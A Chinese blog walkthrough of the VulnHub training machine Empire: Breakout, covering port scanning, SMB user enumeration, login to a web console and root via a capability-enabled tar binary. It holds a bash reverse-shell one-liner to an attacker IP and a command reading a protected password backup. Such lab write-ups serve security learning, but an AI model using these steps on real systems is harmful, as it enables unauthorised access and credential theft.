vulnhub-EMPIRE: BREAKOUT

最新推荐文章于 2024-01-29 23:06:12 发布
最新推荐文章于 2024-01-29 23:06:12 发布
阅读量764 收藏 2
点赞数 2
分类专栏: vulnhub 文章标签: 安全 linux debian
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43006864/article/details/124527913
版权

Empire: Breakout ~ VulnHub

靶机:EMPIRE: BREAKOUT

 

攻击机:

kali linux

Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux

信息收集

nmap 192.168.1.1/24

nmap -sS -sV -A -p- 192.168.1.107

 访问一下80端口

 在页面源码的最底部发现了加密字符串。

这个文件很像上一篇文章里的加密。这里就不在赘述解密过程。

解密后:

.2uqPEfj3D<P'a-3

看起来像是密码。暂时先放下。看看其他两个端口。

https://192.168.1.107:10000/

https://192.168.1.107:20000/

这两端口都是登陆界面。

暂时没有思路。刚才只是拿到了密码。

再仔细看namp的扫描结果,看到目标主机开通了445 139端口的smb服务。

 这里引入SMB利用命令:enum4linux。

enum4linux 192.168.1.107

发现了一个本地用户:cyber。

再拿之前解密的类似密码的字符串去登陆两个登陆界面。

20000端口的登陆成功。

然后,大家仔细看这里。这不是命令行的标志吗。

点开还真是。

那直接可以执行命令了。

开始收集命令:

这个又类似于一个密码。

再看一下那个可运行的tar文件,这里引入getcap命令。

查看一下。

貌似是任意读取文件的权限。

然后再大佬的指示下,找到了一个可疑文件,貌似是密码备份。但是普通用户没权限打开。这里就用到刚才的tar文件。

./tar -zcf pass.tar /var/backups/.old_pass.bak

 

再解压一下:

./tar -xvf passwd.tar

 

看到这个文件就成功了。

好像又是一个密码。

这里我们还需要反弹shell。

开启监听。开始执行shell。

bash -i >& /dev/tcp/192.168.1.108/4321 0>&1

 

成功弹出shell。

成功提权root。

这里是rOOt,刚开始我看成r00t。

这道题算是比较简单的了。知识点是新学习了getcap命令。

 

 

 

 

 

 

 

 

 

 

 

 

大西瓜的安全之路
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[Vulnhub]Empire: Breakout
qq_48749937的博客
03-04 4447
kali ip:192.168.56.105 靶机 ip:192.168.56.110 首先还是常规的扫描靶机开放端口情况 这个靶机跟平常只有ssh和http的靶机不同,没有ssh,猜测可能需要获取webshell 首先访问每一个http服务,80端口: 10000端口: 20000端口: 发现存在两个登录页面,但在审计80端口的首页源码时,发现一串密码,是ook加密: 拿到网站去解密,获得一串密码 成功获取密码,但是目前没有账号,想了好久找不到账号该这么找..
靶机1 Empire:Breakout(帝国突围)
honest_gg的博客
09-09 1150
本靶机首先通过文件共享服务可以使用 enum4linux 枚举信息,在通过主页面进行信息收集,得到相关信息,登录后台getshelll,最后通过可执行文件进行提权
[ vulnhub靶机通关篇 ] Empire Breakout 通关详解
qq_51577576的博客
03-05 1336
[ vulnhub靶机通关篇 ] Empire Breakout 通关详解
Vulnhub靶场】EMPIRE: BREAKOUT
DG_s1mple
01-24 3640
环境准备 下载靶机,导入到vmware里面,这应该不用教了吧 开机可以看到,他已经给出了靶机的IP地址,就不用我们自己去探测了 攻击机IP地址为:192.168.2.15 靶机IP地址为:192.168.2.18 信息收集 使用nmap扫描靶机开放的端口信息 发现靶机开放了三个网页端口和SMB服务 我们去网站访问一下 80端口是正常的网页 但当我去查看源码的时候,发现了ook加密的过后的字符串 翻译过来时:别担心没有人会来这里,和你分享我的权限是安全的。它是加密的:) 解密过后是:.2uqPEfj
Vulnhub靶机渗透之权限提取,SMB泄露问题-靶场Breakout--学习笔记
ZhangAweio的博客
04-09 716
Vulnhub的这个靶场非常适合新手的朋友,里面包含了 信息收集,密码解密,SMB共享文件泄露备份文件泄露,通过泄露的密码进行Linux提权。
altus-empire:MERN专案
04-01
阿尔图斯帝国
empire-web:PowerShell Empire Web界面
05-14
运行Empire REST API服务器获取PowerShell Empire: : ./empire --rest --restport <port> --username <empire> --password <empire> 例如: ./empire --rest --restport 1337 --username admin --password 3mpir3...
vms-empire:设置为BBS门的VMS-Empire版本-开源
04-29
设置为BBS门的VMS-Empire版本。 完全支持游戏保存,因此不必坐一会儿就可以玩...
javascript-empire:202021年ESILV Web应用程序体系结构课程
05-05
Javascript帝国 2021年ESILV Web应用程序体系结构课程 目录 :bullseye: 客观的 Be able to start an online business with a web application. :fishing_pole: 哲学与方法论 本课程的想法是使您踏上...
middle-east-empire:基于 Web 的策略游戏,使用 JavaScript 和 jQuery 创建
07-02
中东帝国基于 Web 的策略游戏,使用 JavaScript 和 jQuery 创建这是网站: :
Vulnhub Empire Breakout
weixin_45682839的博客
08-05 594
VulnHub Empire系列靶场的第二个靶场Breakout学习记录攻略,设计的技术知识:brainfuck加解密、Enum4linux工具的使用、Linux提权
kali-linux-2019内核版本,kali新版本下载,Kali Linux 2019.4 开放下载
weixin_35891825的博客
05-07 1034
我们非常高兴地宣布2019年的第四个也是最后一个版本,Kali Linux 2019.4,可以立即下载。2019.4包括一些令人兴奋的新更新:一个新的默认桌面环境,Xfce新的GTK3主题(用于Gnome和Xfce)“卡利卧底”模式介绍Kali文档有了一个新的家,现在是Git驱动的公共包装——把你的工具放进卡利Kali NetHunter KeX–Android上的完整Kali桌面安装期间的BTR...
Vulnhub靶机:empire breakout
qq_48904485的博客
01-08 849
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:empire:breakout(10.0.2.11)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/empire-breakout,751/
vulnhub靶场之EMPIRE:BREAKOUT
最新发布
qq_58091216的博客
01-29 912
Linux中,能力是一种粒度更细的权限系统,用于授予进程执行特定操作的权限,而不是传统的用户和组权限模型。我们已经有了用户的密码,所以我们要着手寻找用户名了,由于靶机开放了smb服务,所以我们可以收集有关靶机smb的信息, 使用命令enum4linux可以收集大量的信息。用户和组枚举: Enum4linux 可以列出目标系统上的用户和组,包括一些敏感信息,如用户ID(UID)、组ID(GID)、用户描述等。10000端口和20000端口是不同的登录系统,一个是登录网站的,一个是登录用户的。
02-Breakout vulnhub靶场(tar命令,反弹shell笔记)
weixin_62621015的博客
03-19 287
02-Breakout vulnhub靶场个人通关记录
CTF靶机 PowerShell Empire 笔记
z4yn:)的博客
08-28 305
PowerShell Empire 作为Red Primer系列的一部分,了解如何使用这个强大的开发后框架。 Nmap 扫一波端口 发现开放了个445端口,可以尝试用ms17-010 再用Nmap漏洞扫描一下 nmap --script vuln 10.10.241.65 启动MSF msfconsole use windows/smb/ms17_010eternalblue set rhosts 10.10.241.65 set payload windows/x64/meter
vulnhub靶机CLAMP渗透测试
Long_gone的博客
12-07 396
一、扫描 打开靶机后先扫描靶机IP: arp-scan 192.168.34.0/24 经检验,确定靶机IP为:192.168.34.154,然后扫描靶机端口开放情况: nmap -sV -A -p 0-65535 192.168.34.154 发现靶机只开放了22和80端口,先访问80端口看一下: 进来发现是个这个界面,然后扫描一下它的目录,主要这里要加大字段进行目录爆破,否则得话是爆...
Vulnhub_Breakout
qq_45434762的博客
12-12 559
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及...
EMPIRE_BREAKOUT_ 靶场渗透记录
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
10-09 722
初见BrainFxxk加密,反正名字很霸气
vulnhub靶场 breakout
08-29
EMPIRE: BREAKOUT是一个在VulnHub网站上提供的虚拟机靶场。你可以在VulnHub网站上搜索EMPIRE: BREAKOUT,并下载该靶场进行学习和实践。 VulnHub是一个提供各种虚拟机靶场的网站,旨在帮助人们学习和提升网络安全技能...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

大西瓜的安全之路

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值